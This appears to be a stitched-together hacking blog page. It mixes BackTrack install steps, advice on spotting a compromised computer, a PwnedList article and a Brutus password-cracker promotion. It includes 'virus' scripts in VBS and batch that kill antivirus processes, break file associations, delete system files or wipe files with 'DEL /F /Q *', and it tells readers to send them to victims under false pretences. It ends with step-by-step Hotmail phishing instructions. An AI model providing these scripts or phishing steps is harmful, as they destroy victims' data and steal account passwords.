Buffer Overflow Attack Tutorial - Backtrack 5

Firewall and anti-virus are to protect your computer from hacking attack and from viruses but sometimes an attacker can easily bypass them and can get root access into your computer, there are so many techniques and tools are available to bypass or cheat anti-virus and firewall. Buffer overflow is the most common type of computer security attack that allows a hacker to get the administrator access into a computer or a network. As we have discussed so many tutorial by using Backtrack 5 to hack into windows operating system, however there are many exploits are also available for Linux operating system.

I really don't know about the author of this video but the video contain a good example of buffer overflow attack by using an exploit.

Requirements

• Backtrack 5 or Backtrack 5 R1 (Attacker)
• Windows (Victim)
• Mestaploit
• Apache
• Brain

Download Hack Facebook Password here!

BackTrack Live USB Install

This method of getting a live install to a USB drive is the simplest available using Unetbootin. Note that we will format the USB drive and erase its contents.

1. Plug in your USB Drive (Minimum USB Drive capacity 2 GB)
2. Format the USB drive to FAT32
3. Download Unetbootin from http://unetbootin.sourceforge.net/
4. Start Unetbootin and select diskimage (use the backtrack-final ISO)
5. Select your USB drive and click “OK” for creating a bootable BackTrack USB drive
6. Log into BackTrack with the default username and password root / toor

How To Install Backtrack 5 Dual Boot-Tutorial

On a previous article you have seen that how to installbacktrack5 on the entire hard disk by using USB device, if you want to use other operating system like windowswith backtrack so for this purpose you can make virtual machine or you can simply use dual boot technique. In this article I will discuss how to make dual boot to use Linux (backtrack 5) with windows.


The overall method of installation is same as discussed before but the step in which you have to mention the partition is change because of dual boot, for this technique it is assume that you have installed windows on your entire disk and you want to make a partition to install backtrack 5 as well,backtrack 5 is not necessary you can use this technique to install any other version and distro of Linux.

Now I am going to show you how to do this, first of all make back up of your windows installer, if you are using USB to boot backtrack than first learn how to make USB click here. 


After successfully boot 

• Start backtrack installer
• Select your language
• Select your geographical location
• Choose your keyboard layout, or leave it on a default means USA
• Now the next window is to make partition select "Install them side by side, choosing between them each startup" than click forward.

• On the next window confirm the setting for your hard disk.
• Than check all the install component and click on install.
• As discussed on previous article that when the installation reaches at 99% it takes some time so do not worry about it.
• Press the restart button.
• On the next boot your computer will ask you to choose a operating system

• Do not forget the default username root and password toor, and do not forget to change them.
• Now you are able to run backtrack5 with windows XP, windows 7 and Windows Vista..
•  

Download Hack Facebook Password here!

How do I know if my computer has been hacked?

Most computer problems are not caused by computer hackers, it is more common for a computer to be hijacked then hacked. It can be difficult to detect a hacker on a computer because nothing changes to help disguise the hack. Below are the most common things that change after a computer is hacked.

New programs installed

In some situations, you may see new programs or files to the computer. If you are the only user on the computer and new programs are installed, this could be an indication of a hacked computer. However, there are also several legitimate reasons why a new program may appear on the computer, as listed below.

• Operating system or other program received updates that included new programs or files.
• When installing a new program it may have installed other programs. For example, it is common for plugins and other free programs to have a check box asking if it is ok to install a new Toolbar or anti-virus on your computer. If these boxes are checked, new programs are installed.
• Any other person who logs on your computer could install new programs.

Below is a listing of programs that may indicate a hacker has been on the computer.

• Backdoors and Trojans are by far the most common programs to be installed on the computer after it has been hacked. These programs allow the hacker to gain access to the computer.
• IRC clients are another common way for a hacker to get into a computer or remotely control thousands of computers. If you have never participated in a IRC chat, your computer may have been hacked.
• Spyware, rogue anti-virus programs, and malware can be an indication of a hacker. However, are more commonly a sign that your computer has been hijacked while on the Internet.

Computer passwords have changed

Online passwords

Sometimes, after an online account is hacked the attacker changes the password to your account. Try using the forgot password feature to reset the password. If your e-mail address has changed or this feature does not work, contact the company who is providing the service, they are the only ones who can reset your account.

Local computer password

If your password to log into your computer has changed, it may have been hacked. There is no reason why a password would change on its own. Log into an administrator account to change your accounts password.

E-mail spam being sent

When an e-mail account is hacked or taken over, the attacker almost always uses that account to spreadspam and viruses. If your friends, family, or coworkers are receiving e-mail from you advertising something like Viagra your e-mail is compromised. Log into your e-mail and change your e-mail account password.

Tip: E-mail addresses can also be spoofed without hacking the e-mail account. After changing the e-mail password, if your friends continue to get e-mails you have not sent, it is likely someone is spoofing your e-mail address.

Increased network activity

For any attacker to take control of a computer, they must remotely connect to that computer. When someone is remotely connected to your computer, your Internet connection will be slower. Also, many times after the computer is hacked it becomes a zombie to attack other computers.

Installing a bandwidth monitor program on the computer can help determine what programs are using what bandwidth on your computer. Windows users can also use the netstat command to determine remote established network connections and open ports.

There are dozens of other legitimate reasons why your Internet connection may also be slow.

Unknown programs wanting access

Computer security programs and firewalls help restrict access to programs on a network or Internet. If the computer prompts for access to programs you do not know, rogue programs may be installed, or it may have been hacked. If you do not know why a program needs access to the Internet, we recommend blocking access to that program. If you later discover these blocks cause problems, they can be removed.

.Tip: A firewall prompting you for access may also just be someone trying to probe your network, looking for open or available ports in your network.

Security programs uninstalled

If the computers anti-virus, anti-malware program, or firewall that has been uninstalled or disabled this can also be an indication of a hacked computer. A hacker may disable these programs to help hide any warnings that would appear while they are on the computer.

Computer doing things by itself

When someone is remotely connected to a computer they can remotely control any device. For example, a mouse cursor could be moved or something could be typed. If you see the computer doing something as if someone else was in control, this can be an indication of a hacked computer.

Modem users

If the computer is dialing the Internet on its own, it is an indication that a program needs to connect to the Internet. It is common for programs like e-mail clients to do this to check for new e-mail. However, if you cannot identify what program needs Internet access, this can also be an indication of a hacked computer.

Internet browser home page changed or new toolbar

Internet browser changes such as your home page changing to a different web page, a new toolbar getting added, your search provider changing, web pages getting redirected are all signs of a browser getting hijacked and not a computer hacker.

Was Your Email Account Hacked? PwnedList Can Tell You

If you have an account with a company whose servers have been hacked, it’s nerve-wracking to wonder whether or not your private data has been leaked onto the Internet. Thankfully, a new Web service seeks to aggregate all the leaked account data on the Internet and make it easy for you to check and see if you’re on the list.

PwnedList (pwnedlist.com) is the brainchild of Alen Puzic, a professional security intelligence researcher partial to a bit of "white-hat" (good-guy) hacker work. PwnedList was born in July 2011 as a public service to help privacy-minded people verify the security of their online accounts.

“Our goal was to design a simple-to-use online portal where an average user could check to see if his or her account credentials were leaked,” said Puzic in an interview with PCWorld. Within a week, Puzic and his team (including security researchers Stephen Thomas and Jasiel Spelman) had gathered more than a million hacked accounts from websites like The Pirate Bay and PasteBin, social networks like Twitter, and even hacker forums and chatrooms. At the time of the interview, PwnedList had been operating for almost six months, with its database approaching 10 million entries.

But don’t worry: Even though the folks at PwnedList are constantly seeking out compromised usernames, email addresses, and passwords, they don’t store all that information in the PwnedList database. Instead, they take all the compromised account data they find (or that anonymous users submit to them) and use an algorithm to create a unique string of alphanumeric characters for every username and email address. They then save the strings in the PwnedList database before deleting the actual login information. This procedure means that no hacker can crack the PwnedList database and gain access to a single list of the hundreds of thousands of compromised accounts that the PwnedList team is aggregating.

So every time you type a username or email address into the PwnedList search engine, the server runs your request through the same algorithm used to hash the compromised accounts, compares the string generated against the strings in the database, and alerts you if there’s a match. For extra security, you can even avoid typing your email or username into the PwnedList website by hashing it yourself and copying the string. PwnedList uses a 512-bit Secure Hash Algorithm (SHA) hash, so you can just use an online hash generator to convert your favorite email or username into a string of gibberish.

Of course, since the PwnedList database is just a giant list of alphanumeric strings without relevant data like passwords or domain names, the service can tell you only whether or not a particular name or email is on the list; at the time of our interview, PwnedList offered no way for you to know exactly how your email was compromised or which site was hacked. That will probably change with the next version, though.

SEARCH HELP How do I know if my account has been compromised (hacked)

Are your contacts getting emails that you didn’t send? Is your Sent folder (or any other folder) suddenly empty or missing? A hacked (or compromised) account has been accessed by someone other than you. It usually means someone figured out your password. Check for these signs: Your inbox is full of MAILER-DAEMON rejection notices for messages you didn't send. People you know are getting emails from you that you didn’t send. There are outgoing messages in your Sent, Drafts or Outbox folder that you didn’t create or send. Your account folders (Sent, Deleted, Spam, Inbox, etc.) have been emptied or deleted. Your Address Book contacts have been erased. During sign-in or when sending a message, you're asked to pass an image challenge. Emails you try to send are suddenly getting refused and returned to you. There are contacts in your Address Book you didn’t add. You keep getting bumped offline when you're signed into your account. Your email signature suddenly has a link you didn’t put there. You're not getting new mail, OR your new mail is going straight into your Saved IMs folder.

BRUTUS PASSWORD CRACKER – DOWNLOAD BRUTUS-AET2.ZIP AET2

Brutus is one of the fastest, most flexible remote password crackers you can get your hands on – it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 370,000 downloads. Development continues so new releases will be available in the near future.Brutus was written originally to check routers etc. for default and common passwords.FeaturesBrutus version AET2 is the current release and includes the following authentication types :

• HTTP (Basic Authentication)

• HTTP (HTML Form/CGI)

• POP3

• FTP

• SMB

• Telnet

Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.The current release includes the following functionality :

• Multi-stage authentication engine

• 60 simultaneous target connections

• No username, single username and multiple username modes

• Password list, combo (user/password) list and configurable brute force modes

• Highly customisable authentication sequences

• Load and resume position

• Import and Export custom authentication types as BAD files seamlessly

• SOCKS proxy support for all authentication types

• User and password list generation and manipulation functionality

• HTML Form interpretation for HTML Form/CGI authentication types

• Error handling and recovery capability inc. resume after crash/failure.

You can download it here:

Brutus AET2

Make your pc about 200% faster

 Go to start then click run and then type regedit

 Select HKEY_CURRENT_USER and then select control panel folder and then select desktop folder. Do it correctly

 You will see registry setting at your right hand side, after that select menu show delay and then right click and select modify.

 you will find edit string option -----> default value data is 400 , you have to change the value Data to 000

 Restart your computer. You will notice that your computer has become much more faster

Make a folder without a name

 Click the folder, then right click on it, then click rename and delte the old name.

Then pressing ALT button from your keyboard and type 0160 after that press enter.

Important think to notice - you have to type by holding the ALT button, don't stop pressing and while you will type 0160 it will not appear.You should continue typing and then press enter. Another important thing is that you have to type the code (0160) by your numpad. If you type the code from the upper number key it won't work. So, make sure your Numpad key is on.

How Create Virus fun not notorious purpose

Find some detail of How to make some virus ( Not notorious) for just fun and send it to Your target.Your victim will find his/her self in trouble when he/she wil open the file which you sent.But when he/she shut down the PC He/she will get Window notification,By disableing The notification the effect of virus will be delete.


Please note that Some virus tips are not notorious but Some One are really harmful so Think Twice before using this tips.


(1) Frustrate your friend by hitting his/her PC Backspace simultaneously:

Open Note pad and copy following code

Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shel l")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop


Save it as "Anything.VBS" and send it your victim. When he or she try to open this file his/her PC hitting Backspace simultaneously .


(2)Hack your Victim's keyboard and make him type "You are a fool" simultaneously:

Open Note pad and copy following code

Code:
Set wshShell = wscript.CreateObject("WScript.Shell ")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it.

(3) Open Notepad continually in your Victim's computer:

Open Note pad and copy following code

Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.


(4)FAKE VIRUS:

Copy Paste In Notepad And Save As"Hi .bat" File

code:

@echo off
title VIRUS
color 06

echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTACTING ANTI-VIRUS....
pause
echo DO YOU WANT TO DELETE VIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS.....
echo VIRUS ACTIVATED!!!!
pause
:1
dir/s
goto 1

(5) for jamming hard disk...Open Note pad and copy following code

Source Code:-

//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>> â•ša.exe");
}
}
//END

open ur note pad just copy as it is paste it in that ........
name any like Hi.exe...
but .exe is must.....
don't try on ur pc it's small but power full....

(6) deleate all available installed programs;try this out copy this and paste in notepad and rename it abc.bat & send it Victims computer

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


it will deleate all available installed programs!!!!!!!!!!!!!!!!!!!

try urself!!!!!!!!!!!!!!!!!!


(7) Formate hole computer:

Open up notepad and type:

DEL /F /Q *

Save it as "virus.cmd" You can change virus to whatever you want.

DONT OPEN IT!

It deletes everything on your computer.

Send it to your victim, say when they open it all their dreams will come true or some crap.

Hack your Victim's keyboard and make him type "You are a fool" simultaneously

Open Note pad and copy following code

Code:
Set wshShell = wscript.CreateObject("WScript.Shell ")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it

How hackers hack Hotmail or windows live id

Hotmail is also a very famous email service. It is widely used in US and European countries. Today i am going to write how to hack hotmail id. We will use phishing for hacking. The complete process with phoshing script is given below.


follow these steps:

1: download the hotmail phishing page below. This phishing page uses php for storing password in text files
Hotmail phishing


2: Host this script to any free webhost that support php. Get the list of some free host from here


3: Now check your script on your host. this page is just like hotmail login page.


4: send this page to victim via mail or any other service and force him to sign in from this page. Use any kind of social engineering for this.


5: check stored password in yourdomain/detail.txt page